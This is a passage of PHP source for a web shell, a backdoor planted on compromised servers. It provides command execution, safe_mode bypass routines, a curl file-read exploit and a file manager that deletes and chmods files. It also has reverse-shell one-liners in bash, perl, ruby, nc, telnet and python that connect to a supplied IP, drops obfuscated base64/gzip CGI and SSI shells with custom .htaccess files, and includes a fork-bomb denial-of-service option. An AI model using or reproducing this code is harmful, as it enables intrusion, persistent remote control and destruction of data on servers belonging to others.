";
}
}
if (isset($_POST["chmod_string"])) {
if (chmod($file,octdec($_POST["string"]))) {
$form = FALSE;
echo "chmoded ".$file." to ".$_POST["string"]."! back
";
} else {
echo "can't chmod to ".$_POST["string"]."! back
";
}
}
}
// --------------------------------------------- crypt functions by Eugen
function entityenc($str) {
$text_array=explode("\r\n", chunk_split($str, 1));
for ($n=0; $n < count($text_array) - 1; $n++) {
$newstring .= "" . ord($text_array[$n]) . ";";
}
return $newstring;
}
function entitydec($str) {
$str=str_replace(';', '; ', $str);
$text_array=explode(' ', $str);
for ($n=0; $n < count($text_array) - 1; $n++) {
$newstring .= chr(substr($text_array[$n], 2, 3));
}
return $newstring;
}
function asc2hex($str) {
return chunk_split(bin2hex($str), 2, " ");
}
function hex2asc($str) {
$str=str_replace(" ", "", $str);
for ($n=0; $n>6) & 0x3f};
++$i;
if ($i >= $count) break;
if ($i < $count) $value |= (ord($input[$i]) << 16);
$output .= $itoa64{($value>>12) & 0x3f};
++$i;
if ($i >= $count) break;
$output .= $itoa64{($value>>18) & 0x3f};
}
return $output;
}
function to64na($value,$num) {
global $itoa64;
$output = '';
while ($num-1 >= 0) {
--$num;
$output .= $itoa64{$value & 0x3f};
$value >>= 6;
}
return $output;
}
function unap($pwd,$salt,$magic='$1$') {
if (substr($salt,0,strlen($magic)) == $magic) $salt = substr($salt,strlen($magic));
$salt = explode('$',$salt,1);
$salt = substr($salt[0],0,8);
$ctx = $pwd.$magic.$salt;
$final = md5($pwd.$salt.$pwd,true);
for ($pl=strlen($pwd);$pl>=0;$pl-=16) {
$ctx .= substr($final,0,($pl>16?16:$pl));
}
$i = strlen($pwd);
while ($i) {
$ctx .= ($i&1?chr(0):$pwd{0});
$i >>= 1;
}
$final = md5($ctx,true);
for ($i=0;$i<1000;++$i) {
$ctx1 = '';
$ctx1 .= ($i&1?$pwd:substr($final,0,16));
if ($i % 3) $ctx1 .= $salt;
if ($i % 7) $ctx1 .= $pwd;
$ctx1 .= ($i&1?substr($final,0,16):$pwd);
$final = md5($ctx1,true);
}
$passwd = '';
$passwd .= to64na(((int)ord($final{0}) << 16)|((int)ord($final{6}) << 8)|((int)ord($final{12})),4);
$passwd .= to64na(((int)ord($final{1}) << 16)|((int)ord($final{7}) << 8)|((int)ord($final{13})),4);
$passwd .= to64na(((int)ord($final{2}) << 16)|((int)ord($final{8}) << 8)|((int)ord($final{14})),4);
$passwd .= to64na(((int)ord($final{3}) << 16)|((int)ord($final{9}) << 8)|((int)ord($final{15})),4);
$passwd .= to64na(((int)ord($final{4}) << 16)|((int)ord($final{10}) << 8)|((int)ord($final{5})),4);
$passwd .= to64na(((int)ord($final{11})),2);
return $magic.$salt.'$'.$passwd;
}
function phpass($pwd,$salt,$count,$prefix) {
$hash = md5($salt.$pwd,true);
for ($i=0;$i<$count;++$i) {
$hash = md5($hash.$pwd,true);
}
return $prefix.substr($salt,0,8).to64as($hash,16);
}
function genSalt($salt,$length=8,$dot=0) {
if (strlen($salt)>=$length) return substr($salt,0,$length);
global $itoa64;
if (!$dot) { $alphabet=substr($itoa64,2); } else { $alphabet=$itoa64; }
$output='';
for ($i=0;$i<$length;++$i) $output.=$alphabet{mt_rand(0,strlen($alphabet)-1)};
return $output;
}
function mysql4($pwd) {
$nr = 0x50305735;
$nr2 = 0x12345671;
$add = 7;
$charArr = str_split($pwd);
foreach ($charArr as $char) {
if (in_array($char,array(' ','\n'))) continue;
$charVal = ord($char);
$nr ^= ((($nr & 63)+$add) * $charVal)+($nr << 8);
$nr &= 0x7fffffff;
$nr2 += ($nr2 << 8) ^ $nr;
$nr2 &= 0x7fffffff;
$add += $charVal;
}
return sprintf('%08x%08x',$nr,$nr2);
}
// --------------------------------------------- main code
if (!isset($_REQUEST['p'])) { $_REQUEST['p']="s"; }
switch ($_REQUEST['p']) {
case "s":
if (empty($_POST["wut"]) and $download != "1") {
echo $title;
sploent516();
if (ini_get("safe_mode")) {
$failflag="1";
}
$shelltext=("uname -a");
echo '';
echo " pcntl_exec:";
//determining if pcntl enabled is kinda tricky. debug: add if(dl('pcntl.so')) or check var_dump(get_extension_funcs('pcntl')) ?
if (extension_loaded('pcntl')) {
if (function_enabled('pcntl_fork')) {
if (function_enabled('pcntl_exec')) {
echo '';
} else {
echo " pcntl_exec is disabled! ";
}
} else {
echo " pcntl_fork is disabled! ";
}
} else {
echo " fail, no pcntl.so here ";
}
echo " ssh2_exec:";
if (extension_loaded('ssh2')) {
if (function_enabled('ssh2_connect')) {
if (function_enabled('ssh2_exec')) {
if ($download != "1") {
if (empty($_POST["wut"])) {
echo '';
}
}
} else {
echo " ssh2_exec is disabled!";
}
} else {
echo " ssh2_connect is disabled!";
}
} else {
echo " fail, no ssh2.so here";
}
echo $pageend;
} else {
if ($download != "1") {
echo $title;
}
$shelltext=$_POST["command"];
$html='';
break;
case "system":
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
echo "$html"; echo "$input"; echo 'system">';
break;
case "exec":
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
echo "$html"; echo "$input"; echo 'exec">';
break;
case "shell_exec":
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
echo "$html"; echo "$input"; echo 'shell_exec">';
break;
case "popen":
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
echo "$html"; echo "$input"; echo 'popen">';
break;
case "proc_open":
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
echo "$html"; echo "$input"; echo 'proc_open">';
break;
case "eval":
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
echo "$html"; echo 'php -r \''; echo ' \'
';
break;
case "pcntl":
//sploent516 not needed coz pcntl bypasses safe_mode
echo '';
break;
case "ssh2":
echo '';
break;
}
}
}
if (!empty($_POST["wut"])) {
if ($download != "1") {
echo "";
}
}
break;
// --------------------------------------------- shell end; file operations
case "f":
if ($download != "1") {
echo $title;
echo "";
echo "current dir: ".getcwd()." ";
sploent516();
echo " -------------------------------- ";
}
if (empty($_POST["filer"]) and $download != "1" and empty($_POST["edt"]) and empty($_POST["sqlr"]) and empty($_POST["sqlu"]) and empty($_POST["upload"])) {
echo ' >> read/upload/edit file <<
';
$ololotext="/home/USER/public_html/DOMAIN/index.php";
echo '---> read file ';
echo "php file_get_contents: ";
echo '';
//curl
if (strnatcmp(version(),"5.2.9") <= 0) {
echo " curl exploit: ";
if (!extension_loaded('curl')) {
echo " fail, curl is required ";
} else {
echo '';
}
}
} else {
switch ($_POST["filer"]) {
case "php":
$ololotext=($_POST["filename"]);
if ($download != "1") {
echo '';
}
if (!empty($_POST["filename"])) {
if ($download != "1") {
echo '';
echo "";
}
echo $pageend;
die();
}
break;
case "curl":
$ololotext=($_POST["filename"]);
if ($download != "1") {
echo '';
}
if (!empty($_POST["filename"])) {
if ($download != "1") {
echo '';
echo "
---> fail manager ';
}
if ($action=="viewer") {
if (!isset($dir)) {
$dir=getcwd();
}
scandire($_POST["dir"]);
}
if ($action=="download") {
readfile($_POST["file"]);
}
if ($action=="chmod") {
chmodz($_POST["file"]);
}
if ($action=="touch") {
touchz($_POST["file"]);
}
if ($action == 'delete') {
if (unlink($_POST["file"])) $content.="file ".$_POST["file"]." deleted, back";
}
if ($action == 'deletedir') {
if (!rmrf($_POST["file"])) {
$content .="error deleting dir ".$_POST["file"].", back";
} else {
$content .="dir ".$_POST["file"]." deleted, back";
}
}
if (!empty($content)) {
echo $content;
}
if ($download != "1") {
echo ' ';
echo '';
echo $pageend;
}
break;
// --------------------------------------------- file operations end; bind
case "b":
echo $title;
echo ' >> help <<
you could get almost-interactive shell in bind/backconnect with help of these commands
-> if there is python on the server, run:
python -c \'import pty; pty.spawn("/bin/bash")\'
-> ruby:
ruby -rpty -e \'PTY.spawn("/bin/bash")do|i,o|Thread.new do loop do o.print STDIN.getc.chr end end;loop do print i.sysread(512);STDOUT.flush end end\'
-> expect:
expect -c \'spawn sh;interact\'
-> policycoreutils package:
open_init_pty bash
//thanks to tex from rdot.org
for backconnect you should use small one-liners coz there is no temporary file created. in case they fail, try usual "big" backconnects.
//thanks to Bernardo Damele and pentestmonkey.net
if your terminal is broken after using backconnect (i.e. it doesnt show what you type), run command: reset
';
if ($failflag=="1") {
echo "fail, at least one system function needed!
";
} else {
$nc='(dont forget to setup nc first!)';
$semi='dont forget to write ; at the end of command!';
sploent516();
echo " "; //debug: sometimes page cut here, when passthru system shell_exec are disabled
echo ' - - - - = = = = > > one-liners >> show code <<
';
echo ' ';
if (!empty($_POST["oneline"])) {
switch ($_POST["wut"]) {
case "bash":
$c='0<&123;exec 123<>/dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].'; sh <&123 >&123 2>&123';
run($c);
echo "done ";
break;
case "perl":
$c='perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'.$_POST['ip'].':'.$_POST['port'].'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'';
run($c);
echo "done ";
break;
case "ruby":
$c='ruby -rsocket -e \'exit if fork;c=TCPSocket.new("'.$_POST['ip'].'","'.$_POST['port'].'");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\'';
run($c);
echo "done ";
break;
case "nc":
$c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && nc '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1';
run($c);
echo "done ";
break;
case "telnet":
$c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && telnet '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1';
run($c);
echo "done ";
break;
case "python":
$c='python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$_POST['ip'].'",'.$_POST['port'].'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'';
run($c);
echo "done ";
break;
}
}
echo '- - - - = = = = > > classic ';
echo '---> PHP ';
if (!function_enabled('set_time_limit')) { echo 'warning! set_time_limit off! '; }
if (!function_enabled('ignore_user_abort')) { echo 'warning! ignore_user_abort off! '; }
echo '';
if (function_enabled('fsockopen')) {
if (function_enabled('proc_open')) {
echo ' ';
} else { echo 'fail, proc_open is needed for backconnect!
'; }
} else { echo 'fail, fsockopen is needed for backconnect!
'; }
//php end
echo '---> PERL ';
$searchvar=trim(search("perl",$failflag));
if (empty($searchvar)) {
echo "fail, no perl here ";
} else {
echo '';
echo '';
}
//perl end
echo " ";
echo '---> PYTHON ';
$searchvar=trim(search("python",$failflag));
if (empty($searchvar)) {
echo "fail, no python here ";
} else {
echo '';
echo '';
echo '';
echo 'you need to run special client first: >> show code << with this one you will be able to run mc, top, vim, etc
';
echo ' usage: python client.py [host] [port], then input there ^^^^ your host and port. do not remove whitespace! if you see "TERM is not set", run command: export TERM=linux //thanks to ont.rif for interactive backconnect ';
echo "
';
echo 'sometimes CGI and SSI are not disabled globally on the server, so you could use CGI or SSI shell. but to enable CGI/SSI you need to use special .htaccess files. CGI:
'.$htaccesses['cgi'].'
SSI:
'.$htaccesses["ssi"].'
warning: using custom .htaccess could break this site! (it could result in error 500). it is recommended to create new dir and place custom .htaccess and minishells there.
//thanks to profexer for SSI shell and to Michael Foord for python shell
';
if (file_exists(".htaccess")) {
echo ' WARNING: my .htaccess will rewrite current one!';
}
echo ' ';
if ($failflag=="1") {
echo "can't find perl binary (all system functions disabled) assuming /usr/bin/perl ";
}
echo ' ';
if ($failflag=="1") {
echo "can't find python binary (all system functions disabled) assuming /usr/bin/python ";
}
echo ' ';
echo ' ';
//code by Eric A. Meyer, license CC BY-SA
echo '';
echo "---> Text encoderz/decoderz
");
switch ($_POST['cryptmethod']) {
case "asc2hex":
$text=asc2hex($text);
break;
case "hex2asc":
$text=hex2asc($text);
break;
case 'b64enc':
$text=base64_encode($text);
break;
case 'b64dec':
$text=base64_decode($text);
break;
case 'crypt':
$text=crypt($text,'CRYPT_STD_DES');
break;
case 'entityenc':
$text=entityenc($text);
break;
case 'entitydec':
$text=entitydec($text);
break;
case 'md5':
$text=md5($text);
break;
case 'md5md5':
$text=md5(md5($text));
break;
case 'md5unix':
$text=unap($text,$hash,'$1$');
break;
case 'md5wp':
$text=phpass($text,$hash,8192,'$P$B');
break;
case 'md5bb':
$text=phpass($text,$hash,2048,'$H$9');
break;
case 'md5apr':
$text=unap($text,$hash,'$apr1$');
break;
case 'sha1':
$text=sha1($text);
break;
case 'sha256':
$text=crypt($text,'$5$'.$hash.$hash1);
break;
case 'sha512':
$text=crypt($text,'$6$'.$hash.$hash1);
break;
case 'blowfish':
$text=crypt($text,'$2a$07$'.$hash.$hash1.$hash2);
break;
case 'mysql4':
$text=mysql4($text);
break;
case 'mysql5':
$text='*'.strtoupper(sha1(sha1($text,TRUE)));
break;
}
$text=htmlentities($text);
echo("$text
");
}
//decoders end
echo '
---> DoS //use this carefully
';
echo '';
echo $pageend;
}
if (!empty($_POST["extraz"])) {
switch ($_POST["extraz"]) {
case "fork":
while(pcntl_fork()|1);
break;
case "pysh":
//code by Michael Foord & 12309, license WTFPL
if ($failflag=="1") {
$pybin="/usr/bin/python";
} else {
$pybin=search("python",$failflag);
}
$pyshcode='#!'.$pybin;
$pyshcode.="\n";
$pyshcode.=gzinflate(base64_decode("bVRRT9swEH7Pr7jlpa0IKWObtLGmUoEClWBFbR82QRW5idNaS+LIdqBl2n/fnZ10BfGU3N33fXc+n8+o3ZkHoqikMpCshVl9d5+Ql2yV827P49uEVwZRFdPaa6B6pwMCBiC1h0aoTcqVgggaQ9bGy5QswIiCtwm0URnZrYpRLOErlvx20LlRolxPpi28tRuhFtyGK4yaGMvzRIZlYMVPQsky3DAd/+a7rj+/mE3uF/GP0d3Y7+EBdKJEZUqGBUUHhIdXwKXHc83fon3fS3kGa24yqYruE8trngttAjAbTq4ASmkqxTUvTdTpULqUGYbUP389QARkgucpiBL2ZMQAlo7EVmVfuwWTCFiZB2svUe1/Fow1lVoVMLuKdxudBt+DD5HzPyyd2Bu11/DQVkawvbArViO0YFU3Z8UqZbA9g63DBm8Ueu/kcAoeKG5qVdqg17A2nKW2uf7gZnF3OxzcjEeXw8FisrgdD9ELR4e3cERAOAYGF9cTWO3gqn552RWsDKCuUJan5Px4+unk26DvNAZ9p3g+vfxFgt5KpjteUtLOoG+9CKHUHQ/HF0viWtvg+XAuC242OIDwjN2GZ5yUNXJQbDYc3M/GSMG2xzHVFscQISuOCybKOO7Qa6HpBP9Clgbpx3QLZ2D41vQ3psj9BmBHo8CM+JbCK2rZ3EjF1vTw2gFqh+6hkxRpZxmQgVHsIdoYt+12sTbtQX+91mgafTWd3cHdeHEzvYwe/fvpfPHoA0uMkGX0fsuHA1FWtQHyIAUTIYPOgwYdCC0tXsj6fPLou/44RgPS9aoQBLOjgI5r2eL6VI69mdeVezTS7oQ0hy5Gt9IJGndgb9CpLMY/F6PZeASJzHXkfz3xQcln/Dv94uM14duwaw4g2Yg8jXE9CRyavYG7yi2ESla8PO26BL03hDDJpbb3AjjLus6JdKgRKmx39zWN3Ac8dw7HpvdrVyuM7QcvIAD36hxsP5DkyjBZuw8PtGj94bLIeZRZJ81LFuLE2FZ3e6GucmFyUXLtWLSJyKRFxNwTd9nIedDpfttT6p9zNm/H+wc="));
$htaccess=$htaccesses['cgi'];
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
$fh=fopen($_POST["dir"]."/".$_POST["file"],"w");
if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; }
else {
fwrite($fh,$pyshcode);
fclose($fh);
echo $_POST["file"]." write done, chmoding.. ";
$ch=chmod($_POST["dir"]."/".$_POST["file"], 0755);
if (!$ch) {
echo "chmod failed, make chmod 755 manually ";
} else {
echo "chmod done ";
}
if ($_POST["htaccess"] == "on") {
$fh=fopen($_POST["dir"]."/.htaccess","w");
fwrite($fh,$htaccess);
fclose($fh);
echo "htaccess done";
}
}
break;
case "perlsh":
//author/license unknown
if ($failflag=="1") {
$perlbin="/usr/bin/perl";
} else {
$perlbin=search("perl",$failflag);
}
$perlshcode='#!'.$perlbin;
$perlshcode.="\n";
$perlshcode.=gzinflate(base64_decode("TVFLTwIxEL73V4wNMSXZFdSYGBY2QQ7E+DioRxKtu7PSpNuubRdQ5L87XYR4m3bme8w3rUeYzW/hcz1IjX3dLEOtYeSDNKV05SBj7X5gNJpJ19CYqGSQ2r/YG2fXHl0/Y41TJsASZYlOpMVSOo8BJjnwNlTpNe8njAhdeI3kItXSfHRd1/IE0qCCxu7NiUtVIKCRTtaiD33YsvoLeiuY/P3xFT8K9lYJ8PG7yxeGZ91cUDXalqThcpgxbQupofd8O99O758edvTt23fYQqEtLXU3fTwwcSCCUiHwPwaewS5jvUaVBLINGkHTpEZOLvLTc/iJLjpAIc0bWTk5IxPQGo3eg4hAGsAV6W+Z1NLV4mDuaL+zPg64oWhQQmG1nyz49XDBISZL9cXVgufkbL1UGgWMyUMeM4GOgCwemQYHmjySEmSvOSSxf8vu2AGxP0dlXZ2wCK0U6lKkRtY4ySljOotX31RTkFTTHi3uL5TEDGsVBJ/beFg0ZUcDVHT3pbU31I7Svw=="));
$htaccess=$htaccesses['cgi'];
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
$fh=fopen($_POST["dir"]."/".$_POST["file"],"w");
if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; }
else {
fwrite($fh,$perlshcode);
fclose($fh);
echo $_POST["file"]." write done, chmoding.. ";
$ch=chmod($_POST["dir"]."/".$_POST["file"], 0755);
if (!$ch) {
echo "chmod failed, make chmod 755 manually ";
} else {
echo "chmod done ";
}
if ($_POST["htaccess"] == "on") {
$fh=fopen($_POST["dir"]."/.htaccess","w");
fwrite($fh,$htaccess);
fclose($fh);
echo "htaccess done";
}
}
break;
case "ssish":
// code by profexer
$ssishcode=gzinflate(base64_decode("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"));
$htaccess=$htaccesses['ssi'];
if (strnatcmp(version(),"5.2.9") <= 0) {
sploent516();
}
$fh=fopen($_POST["dir"]."/".$_POST["file"],"w");
if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; }
else {
fwrite($fh,$ssishcode);
fclose($fh);
echo $_POST["file"]." write done ";
if ($_POST["htaccess"] == "on") {
$fh=fopen($_POST["dir"]."/.htaccess","w");
fwrite($fh,$htaccess);
fclose($fh);
echo "htaccess done";
}
}
break;
}
}
break;
// extras end ###
case "pi":
phpinfo();
break;
}
// :)
?>